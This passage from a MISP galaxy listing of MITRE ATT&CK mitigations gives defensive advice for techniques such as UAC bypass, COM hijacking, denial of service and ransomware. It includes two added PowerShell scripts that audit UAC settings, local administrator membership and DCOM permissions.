https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Exploitation for Privilege Escalation Mitigation - T1068

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software components targeted for privilege escalation.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Privilege Escalation Mitigation - T1068"

Exploitation for Privilege Escalation Mitigation - T1068 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 6476. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1068

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

Bypass User Account Control Mitigation - T1088

Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate. (Citation: Github UACMe)
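The "highest enforcement level for UAC" and the local administrator membership advice above, together with the ConsentPromptBehaviorUser and EnableInstallerDetection values given in the File System Permissions Weakness section, are all readable from one Registry key and one local group. The script below is an added example, not part of the galaxy or ATT&CK text; it reports the current state and, with -Enforce, applies the strictest settings. UACMe, cited above, is the tool for the separate question of which bypasses still work on a given build.

```powershell
# Added example (not from the MISP/ATT&CK source). Reports UAC policy values and local
# Administrators membership; -Enforce sets the values to the strictest level.
#Requires -RunAsAdministrator
param([switch]$Enforce)

$UacKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$Desired = [ordered]@{
    EnableLUA                  = 1   # UAC on at all; 0 disables it (change needs a reboot)
    ConsentPromptBehaviorAdmin = 2   # "Always notify": consent prompt on the secure desktop (1 = require credentials)
    ConsentPromptBehaviorUser  = 0   # standard users: elevation requests automatically denied
    PromptOnSecureDesktop      = 1   # prompts on the secure desktop, not the user's desktop
    EnableInstallerDetection   = 1   # installers trigger a prompt and are logged
}

function Get-UacState {
    $cur = Get-ItemProperty -Path $UacKey
    foreach ($name in $Desired.Keys) {
        [pscustomobject]@{
            Setting   = $name
            Current   = $cur.$name
            Desired   = $Desired[$name]
            Compliant = ($cur.$name -eq $Desired[$name])
        }
    }
}

function Get-LocalAdminMembers {
    # Members of BUILTIN\Administrators. Anything beyond the built-in Administrator
    # account and the designated admin groups is a candidate for removal.
    Get-LocalGroupMember -SID 'S-1-5-32-544' | Select-Object Name, ObjectClass, PrincipalSource
}

Get-UacState | Format-Table -AutoSize
Get-LocalAdminMembers | Format-Table -AutoSize

if ($Enforce) {
    foreach ($name in $Desired.Keys) {
        Set-ItemProperty -Path $UacKey -Name $name -Value $Desired[$name] -Type DWord
    }
    Get-UacState | Format-Table -AutoSize
}
```

Note the order of the two measures: the UAC values only limit what a process running as a member of Administrators can do silently, whereas taking users out of that group removes the target the bypass techniques need in the first place.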

The tag is: misp-galaxy:mitre-course-of-action="Bypass User Account Control Mitigation - T1088"

Bypass User Account Control Mitigation - T1088 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 6477. Table References

Links

https://attack.mitre.org/mitigations/T1088

https://github.com/hfiref0x/UACME

Exploitation for Defense Evasion Mitigation - T1211

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Defense Evasion Mitigation - T1211"

Exploitation for Defense Evasion Mitigation - T1211 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

Table 6478. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1211

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

Extra Window Memory Injection Mitigation - T1181

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Extra Window Memory Injection Mitigation - T1181"

Extra Window Memory Injection Mitigation - T1181 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181" with estimative-language:likelihood-probability="almost-certain"

Table 6479. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1181

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Exploitation for Credential Access Mitigation - T1212

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for credential access.

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Credential Access Mitigation - T1212"

Exploitation for Credential Access Mitigation - T1212 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 6480. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1212

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://en.wikipedia.org/wiki/Control-flow_integrity

Component Object Model Hijacking Mitigation - T1122

Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.

Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Component Object Model Hijacking Mitigation - T1122"

Component Object Model Hijacking Mitigation - T1122 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122" with estimative-language:likelihood-probability="almost-certain"

Table 6481. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1122

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data from Information Repositories Mitigation - T1213

To mitigate adversary access to information repositories for collection:

  • Develop and publish policies that define acceptable information to be stored

  • Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization

  • Enforce the principle of least-privilege

  • Periodic privilege review of accounts

  • Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories

The tag is: misp-galaxy:mitre-course-of-action="Data from Information Repositories Mitigation - T1213"

Data from Information Repositories Mitigation - T1213 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

Table 6482. Table References

Links

https://attack.mitre.org/mitigations/T1213

Kernel Modules and Extensions Mitigation - T1215

Common tools for detecting Linux rootkits include rkhunter (Citation: SourceForge rkhunter) and chkrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.

LKMs and Kernel extensions require root level permissions to be installed. Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.

Application whitelisting and software restriction tools, such as SELinux, can also aid in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)

The tag is: misp-galaxy:mitre-course-of-action="Kernel Modules and Extensions Mitigation - T1215"

Kernel Modules and Extensions Mitigation - T1215 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"

Table 6483. Table References

Links

http://rkhunter.sourceforge.net

http://www.chkrootkit.org/

https://attack.mitre.org/mitigations/T1215

https://patchwork.kernel.org/patch/8754821/

Network Share Connection Removal Mitigation - T1126

Follow best practices for mitigation of activity related to establishing [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).

Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Connection Removal Mitigation - T1126"

Network Share Connection Removal Mitigation - T1126 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1126" with estimative-language:likelihood-probability="almost-certain"

Table 6484. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1126

https://technet.microsoft.com/en-us/library/ee791851.aspx

Signed Script Proxy Execution Mitigation - T1216

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Signed Script Proxy Execution Mitigation - T1216"

Signed Script Proxy Execution Mitigation - T1216 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 6485. Table References

Links

https://attack.mitre.org/mitigations/T1216

Execution through Module Load Mitigation - T1129

Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlating subsequent behavior to determine if it is the result of malicious activity.

The tag is: misp-galaxy:mitre-course-of-action="Execution through Module Load Mitigation - T1129"

Execution through Module Load Mitigation - T1129 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

Table 6486. Table References

Links

https://attack.mitre.org/mitigations/T1129

Distributed Component Object Model Mitigation - T1175

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AppID_GUID}</code> associated with the process-wide security of individual COM applications. (Citation: Microsoft Process Wide Com Keys)

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole</code> associated with system-wide security defaults for all COM applications that do not set their own process-wide security. (Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)

Consider disabling DCOM through Dcomcnfg.exe. (Citation: Microsoft Disable DCOM)

Enable Windows firewall, which prevents DCOM instantiation by default.

Ensure all COM alerts and Protected View are enabled. (Citation: Microsoft Protected View)
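The per-AppID and machine-wide permissions described above are stored as binary security descriptors, which is why they are usually edited through Dcomcnfg.exe rather than read directly. The script below is an added example, not part of the galaxy or ATT&CK text; it inventories the machine-wide Ole values and decodes each AppID's launch and access permissions into SDDL so remote-capable grants to broad principals can be reviewed before deciding whether to tighten them or disable DCOM.

```powershell
# Added example (not from the MISP/ATT&CK source). Inventories DCOM security: the
# machine-wide defaults under HKLM\SOFTWARE\Microsoft\Ole and every AppID that sets its
# own permissions or RunAs identity, with binary descriptors decoded to SDDL.
function ConvertTo-Sddl {
    param([byte[]]$Bytes)
    if (-not $Bytes) { return $null }
    (New-Object System.Security.AccessControl.RawSecurityDescriptor($Bytes, 0)).GetSddlForm('All')
}

# 1. Machine-wide settings. EnableDCOM = 'N' is what Dcomcnfg writes when "Enable
#    Distributed COM on this computer" is cleared. The Default*Permission values apply to
#    COM servers without AppID-specific permissions; absence means built-in OS defaults.
$ole = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Ole'
[pscustomobject]@{
    EnableDCOM                = $ole.EnableDCOM
    LegacyAuthenticationLevel = $ole.LegacyAuthenticationLevel
    DefaultLaunchPermission   = ConvertTo-Sddl $ole.DefaultLaunchPermission
    DefaultAccessPermission   = ConvertTo-Sddl $ole.DefaultAccessPermission
    MachineLaunchRestriction  = ConvertTo-Sddl $ole.MachineLaunchRestriction
    MachineAccessRestriction  = ConvertTo-Sddl $ole.MachineAccessRestriction
} | Format-List

# 2. Per-application settings. Only AppIDs that override launch/access permissions or
#    set a RunAs identity are listed; the rest inherit the defaults shown above.
Get-ChildItem 'HKLM:\SOFTWARE\Classes\AppID' | ForEach-Object {
    $p = Get-ItemProperty -LiteralPath $_.PSPath
    if ($p.LaunchPermission -or $p.AccessPermission -or $p.RunAs) {
        [pscustomobject]@{
            AppID            = $_.PSChildName
            Name             = $p.'(default)'
            RunAs            = $p.RunAs
            LaunchPermission = ConvertTo-Sddl $p.LaunchPermission
            AccessPermission = ConvertTo-Sddl $p.AccessPermission
        }
    }
} | Format-List
```

Reading the SDDL: the generic rights letters map onto the COM access mask, so CC is execute, DC local launch, LC remote launch, SW local activation and RP remote activation. An ACE such as (A;;CCDCLCSWRP;;;AU) grants Authenticated Users remote launch and activation, which is the kind of entry to either narrow to a specific group or remove by disabling DCOM where the application does not need it.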

The tag is: misp-galaxy:mitre-course-of-action="Distributed Component Object Model Mitigation - T1175"

Distributed Component Object Model Mitigation - T1175 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"

Table 6487. Table References

Links

https://attack.mitre.org/mitigations/T1175

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx

https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

https://technet.microsoft.com/library/cc771387.aspx

Man in the Browser Mitigation - T1185

Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique.

Close all browser sessions regularly and when they are no longer needed.

The tag is: misp-galaxy:mitre-course-of-action="Man in the Browser Mitigation - T1185"

Man in the Browser Mitigation - T1185 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 6488. Table References

Links

https://attack.mitre.org/mitigations/T1185

Hidden Files and Directories Mitigation - T1158

Mitigation of this technique may be difficult and ill-advised due to the legitimate use of hidden files and directories.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Files and Directories Mitigation - T1158"

Hidden Files and Directories Mitigation - T1158 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158" with estimative-language:likelihood-probability="almost-certain"

Table 6489. Table References

Links

https://attack.mitre.org/mitigations/T1158

Data Encrypted for Impact Mitigation - T1486

Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)

In some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Encrypted for Impact Mitigation - T1486"

Table 6490. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1486

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.ready.gov/business/implementation/IT

Network Denial of Service Mitigation - T1498

When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)

Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)

As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)

The tag is: misp-galaxy:mitre-course-of-action="Network Denial of Service Mitigation - T1498"

Table 6491. Table References

Links

http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

https://attack.mitre.org/mitigations/T1498

Endpoint Denial of Service Mitigation - T1499

Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.

The tag is: misp-galaxy:mitre-course-of-action="Endpoint Denial of Service Mitigation - T1499"

Table 6492. Table References

Links

http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

https://attack.mitre.org/mitigations/T1499

Exploit Public-Facing Application Mitigation - T1190

Application isolation and least privilege help lessen the impact of an exploit. Application isolation will limit what other processes and system features the exploited target can access, and least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system. Web Application Firewalls may be used to limit exposure of applications.

Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.

Use secure coding best practices when designing custom software that is meant for deployment to externally facing systems. Avoid issues documented by OWASP, CWE, and other software weakness identification efforts.

Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Public-Facing Application Mitigation - T1190"

Exploit Public-Facing Application Mitigation - T1190 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 6493. Table References

Links

https://attack.mitre.org/mitigations/T1190

Two-Factor Authentication Interception Mitigation - T1111

Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.

Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Two-Factor Authentication Interception Mitigation - T1111"

Two-Factor Authentication Interception Mitigation - T1111 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"

Table 6494. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1111

https://technet.microsoft.com/en-us/library/ee791851.aspx

.bash_profile and .bashrc Mitigation - T1156

Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.

The tag is: misp-galaxy:mitre-course-of-action=".bash_profile and .bashrc Mitigation - T1156"

.bash_profile and .bashrc Mitigation - T1156 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156" with estimative-language:likelihood-probability="almost-certain"

Table 6495. Table References

Links

https://attack.mitre.org/mitigations/T1156

System Owner/User Discovery Mitigation - T1033

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Owner/User Discovery Mitigation - T1033"

System Owner/User Discovery Mitigation - T1033 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 6496. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1033

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Application Window Discovery Mitigation - T1010

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Application Window Discovery Mitigation - T1010"

Application Window Discovery Mitigation - T1010 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 6497. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1010

https://technet.microsoft.com/en-us/library/ee791851.aspx

Behavior Prevention on Endpoint - M1040

Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.

The tag is: misp-galaxy:mitre-course-of-action="Behavior Prevention on Endpoint - M1040"

Table 6498. Table References

Links

https://attack.mitre.org/mitigations/M1040

Winlogon Helper DLL Mitigation - T1004

Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.

Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="Winlogon Helper DLL Mitigation - T1004"

Winlogon Helper DLL Mitigation - T1004 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"

Table 6499. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1004

Compile After Delivery Mitigation - T1500

This type of technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, blocking all file compilation may have unintended side effects, such as preventing legitimate OS frameworks and code development mechanisms from operating properly. Consider removing compilers if not needed, otherwise efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Identify unnecessary system utilities or potentially malicious software that may be used to decrypt, deobfuscate, decode, and compile files or information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Compile After Delivery Mitigation - T1500"

Table 6500. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1500

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Use Recent OS Version - M1006

New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.

The tag is: misp-galaxy:mitre-course-of-action="Use Recent OS Version - M1006"

Use Recent OS Version - M1006 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"

Table 6501. Table References

Links

https://attack.mitre.org/mitigations/M1006

System Service Discovery Mitigation - T1007

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Service Discovery Mitigation - T1007"

System Service Discovery Mitigation - T1007 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 6502. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

